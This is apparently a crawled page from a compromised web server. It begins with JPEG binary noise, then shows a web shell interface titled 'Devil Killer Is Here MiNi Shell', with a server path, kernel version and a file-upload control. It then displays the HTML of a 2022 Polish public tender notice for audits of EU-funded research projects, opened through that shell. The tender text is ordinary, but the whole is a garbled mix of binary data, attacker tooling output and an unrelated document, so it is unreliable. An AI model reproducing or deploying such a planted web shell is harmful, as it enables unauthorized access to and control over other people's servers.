JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220323/0009647901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> PN 10/03/2022 - audyty </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Chemii Bioorganicznej Polskiej Akademii Nauk</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000849327</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Noskowskiego 12/14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-704</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi-pcss@man.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">portal.ichb.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka naukowo - badawcza </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność naukowo - badawcza </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PN 10/03/2022 - audyty </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4ce8d09f-a9df-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00096479</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Prace realizowane w ramach projektów współfinansowanych przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach programu Inteligentny Rozwój </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pcss_poznan <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pcss_poznan</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Z<br/>zastrzeżeniem wyjątków o których mowa w SWZ komunikacja między zamawiającym a wykonawcami<br/>odbywa się przy użyciu platformy zakupowej (dalej zwanej „Platformą”) pod adresem:<br/>https://platformazakupowa.pl/pn/pcss_poznan.<br/>2. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń, o<br/>których mowa w niniejszej SWZ, składane są przez wykonawcę wyłącznie za pośrednictwem platformy<br/>zakupowej: https://platformazakupowa.pl/pn/pcss_poznan.<br/>3. Zamawiający informuje, że adres e-mail: przetargi-pcss@man.poznan.pl - wskazany w ogłoszeniu o<br/>zamówieniu, służy jedynie do przesyłania ogłoszeń przez zamawiającego i otrzymywania informacji<br/>zwrotnej z Dziennika Urzędowego Unii Europejskiej. Nie jest to adres do komunikacji między<br/>zamawiającym a wykonawcami.<br/>4. Celem skomunikowania się z zamawiającym (z wyłączeniem złożenia oferty, przedmiotowych<br/>środków dowodowych lub oświadczeń składanych razem z ofertą) wykonawca korzysta z przycisku<br/>„wyślij wiadomość do zamawiającego” na platformie zakupowej. Za datę przekazania (wpływu)<br/>oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformy poprzez kliknięcie przycisku „wyślij wiadomość do zamawiającego” i<br/>pojawieniu się komunikatu, że wiadomość została wysłana do zamawiającego.<br/>5. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem https://platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji warunków zamówienia, zmiany terminu składania i otwarcia ofert zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi<br/>Ogłoszenie nr 2022/BZP 00038423/01 z dnia 2022-01-27<br/>2022-01-27 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za<br/>pośrednictwem https://platformazakupowa.pl do konkretnego wykonawcy na adres e-mail podany<br/>przez wykonawcę w Formularzu oferty.<br/>6. Zamawiający, zgodnie Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na https://platformazakupowa.pl/pn/pcss_poznan, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje;<br/>c) przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji;<br/>d) włączona obsługa JavaScript;<br/>e) łącze internetowe o przepustowości co najmniej 256 kbit/s;<br/>f) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>g) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie<br/>UTF8;<br/>h) platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli;<br/>i) akceptująca pliki typu „cookies”;<br/>j) oznaczenie czasu odbioru danych przez platformazakupowa.pl stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>7. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się<br/>w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Instytut Chemii Bioorganicznej Polskiej Akademii Nauk w<br/>Poznaniu (ICHB PAN, jako zamawiający, informuje, że dane osobowe dotyczące wykonawcy i<br/>prowadzonej przez niego działalności gospodarczej, osób upoważnionych do reprezentacji wykonawcy<br/>w postępowaniu o udzielenie zamówienia publicznego oraz dane dotyczące podmiotów na zasoby<br/>których wykonawca powołuje się w tym postępowaniu będą przetwarzane zgodnie treścią art. 13<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.04.2016 r. w sprawie ochrony<br/>osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE, dalej zwane RODO. Administratorem danych osobowych jest Instytut Chemii<br/>Bioorganicznej Polskiej Akademii Nauk w Poznaniu adres: ul. Z. Noskowskiego 12/14, 61-704 Poznań;<br/>REGON 000849327 NIP 777-00-02-062. Dane osobowe przetwarzane są na podstawie:<br/>- art. 6 ust. 1 lit. b RODO, w celu podjęcia działań na rzecz wykonawcy przed zawarciem umowy<br/>udzielenie zamówienia publicznego, zawarciem tej umowy, jej wykonaniem oraz jej rozliczeniem;<br/>- art. 6 ust. 1 lit. c RODO, w celu wypełnienia obowiązków ciążących na administratorze zgodnie<br/>przepisami ustawy Prawo zamówień publicznych;<br/>- art. 6 ust. 1 lit f RODO, w celu zabezpieczenia i dochodzenia ewentualnych roszczeń zamawiającego<br/>w umowie z wykonawcą, jako prawnie uzasadnionych interesów realizowanych przez zamawiającego.<br/>Ogłoszenie nr 2022/BZP 00038423/01 z dnia 2022-01-27<br/>2022-01-27 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>Dane osobowe będą przechowywane w trakcie okresu współpracy z zamawiającym oraz na potrzeby<br/>archiwizacji dokumentacji związanej ze współpracą według okresów wskazanych w przepisach<br/>szczegółowych albo wynikających z zasad finansowania zamówienia. Wykonawca ma prawo dostępu<br/>do treści danych oraz żądania ich sprostowania, usunięcia danych w sytuacji, gdy przetwarzanie<br/>danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach<br/>sprawowania władzy publicznej oraz prawo do ograniczenia przetwarzania danych przy czym przepisy<br/>odrębne mogą wyłączyć możliwość skorzystania z tego prawa, prawa do wniesienia sprzeciwu wobec<br/>przetwarzania, a także prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/>gdy uzna, iż przetwarzanie danych osobowych narusza przepisy RODO. Inspektorem Ochrony Danych,<br/>wyznaczonym przez Administratora danych osobowych, można kontaktować się za pośrednictwem<br/>poczty elektronicznej pod adresem dpo@ibch.poznan.pl, a także pocztą tradycyjną pod adresem:<br/>Instytut Chemii Bioorganicznej PAN - Inspektor Ochrony Danych, ul. Z. Noskowskiego 12/14, 61-704<br/>Poznań. Podanie przez wykonawcę danych osobowych jest dobrowolne, ale konieczne dla celów<br/>związanych z nawiązaniem i przebiegiem współpracy. Dane osobowe nie będą poddawane<br/>profilowaniu. Dane osobowe mogą zostać udostępnione organom uprawnionym na podstawie<br/>przepisów prawa oraz powierzone innym osobom oraz jednostkom organizacyjnym, które współpracują<br/>zamawiającym albo które ubiegają się o taką współpracę. Ponadto dane te mogą być przekazywane<br/>organom właściwych w sprawach zamówień publicznych oraz instytucjom finansującym zamówienia<br/>publiczne; przy czym nie można wykluczyć, że będą to podmioty spoza Europejskiej Obszaru<br/>Gospodarczego, z dowolnego państwa na świecie, chyba że zakaz przekazywania danych, wynika z<br/>odrębnych przepisów prawa. Dane osobowe mogą zostać udostępnione organom uprawnionym na<br/>podstawie przepisów prawa oraz powierzone na podstawie umowy powierzenia zawartej na piśmie<br/>podmiotom współpracującym z zamawiającym.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PN 10/03/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie audytów projektów realizowanych w ramach programu Horyzont 2020:<br/>a)	Projektu pod nazwą „Social Sciences &amp; Humanities Open Cloud”, akronim SSHOC nr kontraktu 823782, z całościowym budżetem przypadającym na zamawiającego 411 250 EUR, w którym zamawiający uczestniczy poczynając od 1 stycznia 2019 roku, a przewidywany termin zakończenia projektu przypada na 30 kwietnia 2022 roku, zgodnie z zasadami programu Horyzont 2020.<br/>b)	Projektu pod nazwą „H2020-SGA-INFRA-GEANT-2018 (Topic [a] Research and Education Networking”, akronim GN4-3 nr kontraktu 856726, z całościowym budżetem przypadającym na zamawiającego 7 310 315 EUR, w którym zamawiający uczestniczy poczynając od 1 stycznia 2019 roku, a przewidywany termin zakończenia projektu przypada na 31 grudnia 2022 roku, zgodnie z zasadami programu Horyzont 2020,<br/>c)	Projektu pod nazwą „FOSTERING PRECISION AGRICULTURE AND LIVESTOCK FARMING THROUGH SECURE ACCESS TO LARGE-SCALE HPC-ENABLED VIRTUAL INDUSTRIAL EXPERIMENTATION ENVIRONMENT EMPOWERING SCALABLE BIG DATA ANALYTICS”, akronim CYBELE nr kontraktu 825355, z całościowym budżetem przypadającym na Zamawiającego 468 875 EUR, w którym zamawiający uczestniczy poczynając od 1 stycznia 2019 roku, a przewidywany termin zakończenia projektu przypada na 31 marca 2022 roku, zgodnie z zasadami programu Horyzont 2020, <br/>d)	Projektu pod nazwą „Interactive and agile/responsive sharing mesh of storage, data and applications for EOSC”, akronim CS3MESH4EOSC nr kontraktu 863353, z całościowym budżetem przypadającym na zamawiającego 854 500 EUR, w którym zamawiający uczestniczy poczynając od 1 stycznia 2020 roku, a przewidywany termin zakończenia projektu przypada na 31 grudnia 2022 roku, zgodnie z zasadami programu Horyzont 2020. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79212000-3 - Usługi audytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się kryteriami wyszczególnionymi poniżej. Oferty będą oceniane metodą punktową w skali 100-punktowej, z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty za kryterium oceny ofert według zasad określonych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Prace realizowane w ramach projektów współfinansowanych przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach programu Inteligentny Rozwój:<br/>a)	Projektu pod nazwą „Cyfrowa infrastruktura badawcza dla humanistyki i nauk o sztuce DARIAH-PL”, akronim DARIAH-PL nr umowy POIR.04.02.00-00-D006/20 z budżetem 129 496 338,76 zł w którym zamawiający wraz z partnerami wymienionymi poniżej uczestniczy poczynając od 1 stycznia 2021 roku, a przewidywany termin zakończenia projektu przypada na 31 grudnia 2023 roku. Audyt musi być przeprowadzony po zrealizowaniu co najmniej 50% planowanych wydatków w projekcie, ale przed zrealizowaniem 80% planowanych wydatków w projekcie, zgodnie z zapisami Wytycznych dla podmiotów audytujących projekty badawczo – rozwojowe. <br/>Partnerami zamawiającego w projekcie są:<br/>1)	Uniwersytet Warszawski, ul. Krakowskie Przedmieście 26/28, 00-927 Warszawa,<br/>2)	Akademia Sztuk Pięknych, , ul. Krakowskie Przedmieście 5, 00-068 Warszawa (partner z zerowym budżetem),<br/>3)	Instytut Badań Literackich PAN, ul. Nowy Świat 72, 00-330 Warszawa,<br/>4)	Instytut Historii im. Tadeusza Manteuffla PAN, ul. Rynek Starego Miasta 29/31, <br/>00-272 Warszawa,<br/>5)	Instytut Języka Polskiego PAN, Al. Adama Mickiewicza 31, 31-120 Kraków,<br/>6)	Instytut Podstaw Informatyki PAN, ul. Jana Kazimierza 5, 01-248 Warszawa,<br/>7)	Instytut Slawistyki PAN, ul. Juliana Bartoszewicza 1B/17, 00-238 Warszawa (partner z zerowym budżetem),<br/>8)	Instytut Sztuki PAN, ul. Długa 26/28, 00-337 Warszawa,<br/>9)	Politechnika Wrocławska, ul. Wybrzeże Stanisława Wyspiańskiego 27, 50-370 Wrocław,<br/>10)	Uniwersytet im. Adama Mickiewicza w Poznaniu, ul. Henryka Wieniawskiego 1, <br/>61-712 Poznań,<br/>11)	Uniwersytet Jagielloński, ul. Gołębia 24, 31-007 Kraków (partner z zerowym budżetem),<br/>12)	Uniwersytet Marii Curie-Skłodowskiej, Pl. Marii Curie – Skłodowskiej 5, 20-031 Lublin,<br/>13)	Uniwersytet Mikołaja Kopernika w Toruniu, ul. Jurija Gagarina 11, 87-100 Toruń (partner z zerowym budżetem),<br/>14)	Uniwersytet Wrocławski, pl. Uniwersytecki 1, 50-137 Wrocław,<br/>15)	Politechnika Poznańska, pl. Marii Skłodowskiej –Curie 5, 60-965 Poznań.<br/>b)	Projektu pod nazwą „PRACE-LAB2 – Współpraca w zakresie zaawansowanych obliczeń w Europie” nr umowy POIR.04.02.00-00-00-C003/19 z budżetem 211 196 600,00 zł w którym zamawiający wraz z partnerami wymienionymi poniżej uczestniczy poczynając od 1 lipca 2020 roku, a przewidywany termin zakończenia projektu przypada na 31 grudnia 2023 roku. Audyt musi być przeprowadzony po zrealizowaniu co najmniej 50% planowanych wydatków w projekcie, ale przed zrealizowaniem 80% planowanych wydatków w projekcie, zgodnie z zapisami Wytycznych dla podmiotów audytujących projekty badawczo – rozwojowe. <br/>Partnerami zamawiającego w projekcie są:<br/>1)	Akademia Górniczo-Hutnicza im. Stanisława Staszica Akademickie Centrum Komputerowe Cyfronet, Al. Mickiewicza 30, 30-059 Kraków,<br/>2)	Politechnika Gdańska CI TASK, ul. G. Narutowicza 11/12, 80-233 Gdańsk,<br/>3)	Politechnika Wrocławska, ul. Wybrzeże Wyspiańskiego 27, 50-370 Wrocław,<br/>4)	Narodowe Centrum Badań Jądrowych, ul. Andrzeja Sołtana 7, 05-400, Otwock.<br/>c)	Projektu pod nazwą „PIONIER-LAB – Krajowa Platforma Integracji Infrastruktur Badawczych z Ekosystemami Innowacji” nr umowy POIR.04.02.00-30-A005/16 z budżetem 469 147 452,76 zł w którym zamawiający wraz z partnerami wymienionymi poniżej uczestniczy poczynając od 1 stycznia 2018 roku, a przewidywany termin zakończenia projektu przypada na 31 grudnia 2023 roku. Audyt musi być przeprowadzony po zrealizowaniu co najmniej 50% planowanych wydatków w projekcie, ale przed zrealizowaniem 80% planowanych wydatków w projekcie, zgodnie z zapisami Wytycznych dla podmiotów audytujących projekty badawczo – rozwojowe. <br/>Partnerami zamawiającego w projekcie są:<br/>1)	Politechnika Bydgoska im. Jana i Jędrzeja Śniadeckich, ul. Aleje prof. Sylwestra Kaliskiego 7, 85-796 Bydgoszcz,<br/>2)	Akademia Górniczo-Hutnicza im. Stanisława Staszica Akademickim, Centrum Komputerowe Cyfronet AGH, ul. Nawojki 11, 30-950 Kraków,<br/>3)	Instytut Uprawy, Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy, ul. Czartoryskich 8, 24-100 Puławy,<br/>4)	Uniwersytet Marii Curie-Skłodowskiej w Lublinie, pl. Marii Curie-Skłodowskiej 5,<br/>20-031 Lublin,<br/>5)	Politechnika Białostocka, ul. Wiejska 45a, 15-351 Białystok,<br/>6)	Politechnika Częstochowska, ul. Dąbrowskiego 69, 42-201 Częstochowa,<br/>7)	Politechnika Gdańska, CI TASK, ul. Narutowicza 11/12, 80-233 Gdańsk,<br/>8)	Politechnika Koszalińska, ul. Śniadeckich 2, 75-453 Koszalin,<br/>9)	Politechnika Łódzka, ul. Żeromskiego 116, 90-924 Łódź, <br/>10)	Uniwersytet Technologiczno-Humanistyczny im. Kazimierza Pułaskiego w Radomiu, ul. Malczewskiego 29, 26-600 Radom,<br/>11)	Politechnika Rzeszowska im. I. Łukasiewicza, al. Powstańców Warszawy 12, <br/>35-959 Rzeszów,<br/>12)	Zachodniopomorski Uniwersytet Technologiczny w Szczecinie, al. Piastów 17, <br/>70-310 Szczecin,<br/>13)	